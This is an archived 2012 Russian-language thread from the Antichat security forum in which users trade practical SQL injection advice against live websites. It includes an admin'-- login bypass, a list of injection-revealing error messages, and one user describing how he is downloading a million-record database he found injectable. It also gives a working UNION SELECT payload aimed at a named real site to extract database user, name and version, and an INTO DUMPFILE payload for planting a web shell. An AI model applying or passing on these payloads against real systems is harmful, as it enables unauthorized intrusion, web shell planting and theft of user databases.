ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.04.2012, 04:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
13402
Репутация:
1
|
|
Сообщение от diny
diny said:
в чем трабла ? ошибка в поле логин, все время пишет
Message: MySQL Query fail: SELECT user_pass, user_salt, user_groupid, user_id FROM `users` WHERE user_name = ''--'
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
пробовал зайти как админ прописав в логине admin'-- , но никак..
пробовал group и order писать , тоже ноль .
через union не получается
чтобы зайти под логином admin - нужно чтобы на этом сайте был логин admin понимаешь? он может быть сидеть не под ником admin, и вписавши его настоящий ник с правами админа - вот тогда все получиться. А так БД не понимает, что ты от нее хочешь. Также в ошибке можно найти названия таблицы, иногда с ником админа. Скачай движ данного сайты, и на локалхосте потренеруйся. Установи БД, полазь как админ, придумай логин себе и пасс, и обойди же его.
|
|
|
|
03.04.2012, 13:40
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009
Репутация:
18
|
|
Есть вопрос!
Давно не занимался такими делами и уже забыл)
Недавно нашел скулю на сайте, база 1 мил.
Подметил прогу запустил на внс и жду )
прошло несколько времени я решил проверить как там моя база)
оказалось что какая то ошибка, 47 тыс. уже скачало, а вот дальше ошибка, я думал прикрыли скуль но смотрю она есть, начал тестить оказалось что нужно разбивать лимит.
153,1
306,2
612,3
...
иначе не хочет.
Иинтересно тот факт что если делать как я прежний раз скачал то уже так не работает доходит до 153 (.
Что можете посоветовать?
я вижу вариант переделать скрипт чтоб качал базу по пакетно!
|
|
|
09.06.2012, 14:44
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Апну пожалуй, я тут составил некоторый список ошибок, которые выплевываются в том случае, когда возможно провести инъекцию.
Некоторые из них распостранены, а некоторые весьма специфичны:
Код:
Code:
You have an error in your SQL syntax
Пустая страница (вероятность 50%)
Warning: mysql_num_rows()
Warning: mysql_fetch_array()
Warning: mysql_fetch_assoc()
Warning: mysql_fetch_object()
Warning: extract() [function.extract]
Could not execute query
DataBase Error!!!
A error occured: Line 1: Incorrect syntax near 'value''
Error
SQL Query Error
TERM doesn't exist in dbase
Маскировка под запятую (,)
Маскировка под число или слово (193 or slave)
Специфическая ошибка на определенном языке (напрямую или косвенно связана с предыдущими случаями)
и тд. |
|
|
|
26.08.2012, 00:35
|
|
Новичок
Регистрация: 09.08.2009
Сообщений: 7
Провел на форуме:
30759
Репутация:
0
|
|
Уважаемые, подскажите по одному вопросу, а то всю голову сломал.
Есть инъекция на одном сайте, однако из-за неких правил обработки переменных, не получается провести полноценную инъекцию.
Проблема вот в чем:
Уязвимая переменная: ?var=(123,456)
вот данные внутри ни как не проверяются, однако в скрипте данные парсятся либо через explode либо регуляркой, и возникает проблема в том, что если я буду писать что-то типа union select all 1,2,3... Все что после первой запятой обрежется. Ну т.е. из переменной ?var=(123,456) union select all 1,2,3..%23) в запрос попадет 456) union select all 1 , что по понятной причине не дает возможность проэксплуатировать скулю.
Каким образом можно просунуть поля без использования запятых?
P.S. через %2C пробовал, тот же эффект.
Количество полей узнал, union срабатывает, осталось дело за малым, подставить ему эти поля и дело в шляпе.
|
|
|
|
26.08.2012, 18:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Ламеры атакуют
При попытке подобрать количество полей вот такая ошибка.
SELECT * FROM stat WHERE id=1 order by 100000 -- LIMIT 1 failed!
Unknown column '100000' in 'order clause'
Подскажите пожалуйста в чём проблема.Не судите строго.Новичёк.
http://softobzor.com.ua/stat_info.php?id=1'+GROUP+BY+10000+--+
|
|
|
|
26.08.2012, 19:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
74477
Репутация:
21
|
|
_ttp://softobzor.com.ua/stat_info.php?id=-1 +union+select+1,concat_ws(user(),database(),versio n()),3,4 --
|
|
|
|
26.08.2012, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Сообщение от DyukiN
DyukiN said:
_ttp://softobzor.com.ua/stat_info.php?id=-1 +union+select+1,concat_ws(user(),database(),versio n()),3,4 --
Подскажите пожалуйста подробней.Что я не так делал?И что Вы вывели таким кодом.Спасибо.
|
|
|
|
26.08.2012, 19:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
74477
Репутация:
21
|
|
у вас кавычка была лишняя
|
|
|
|
26.08.2012, 20:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
а что Вы вывели таким кодом?
|
|
|
|
26.08.2012, 22:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Сообщение от Дирижабль
Дирижабль said:
union+select+1,'',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*
Подскажите пожалуйста здесь подробнее.
'
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
